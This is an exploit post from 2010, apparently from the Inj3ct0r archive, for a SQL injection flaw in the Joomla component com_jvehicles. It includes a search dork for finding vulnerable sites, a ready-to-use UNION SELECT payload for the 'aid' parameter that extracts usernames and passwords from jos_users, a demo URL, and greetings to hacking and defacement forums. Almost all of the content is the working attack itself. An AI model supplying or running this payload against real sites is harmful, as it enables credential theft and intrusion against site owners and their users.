Joomla Component com_jvehicles SQL injection Vulnerability
Posted on 15 April 2010
========================================================== Joomla Component com_jvehicles SQL injection Vulnerability ========================================================== # Exploit Title : joomla component jvehicles SQL injection Vulnerability # Date : 15 april 2010 # Author : Sudden_death (suddendeath404@yahoo.com) # Software Link : N/A # Tested on : Windows XP 2 # Platform/Tested on: Windows XP 2 SP 2 # myweb : http://suddendeath.000space.com/ # dork : inurl:option=com_jvehicles # Code : +and+1=2+union+select+1,2,group_concat(username,0x3a,password)suddendeath,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- ====================================================================== # EXPLOIT / c0de +and+1=2+union+select+1,2,group_concat(username,0x3a,password)suddendeath,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- # VULN IN HERE http://localhost/joomla/index.php?option=com_jvehicles&task=agentlisting&aid=62[c0de} # LIVE DEMO http://localhost/joomla/index.php?option=com_jvehicles&task=agentlisting&aid=62+and+1=2+union+select+1,2,group_concat(username,0x3a,password)suddendeath,4,5,6,7,8,9,10,11,12+from+jos_users-- [#]------------------------------------------------------------------- GREETZ TO WE FORUM: [ indonesianhacker[dot]com | indonesiandefacer[dot]org ] [#]------------------------------------------------------------------- MY BROTHA : | MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster | | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | | cah_surip | demnas | RXn7 | and all crew indonesia hacker :D | [#]------------------------------------------------------------------- note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan! # Inj3ct0r.com [2010-04-15]
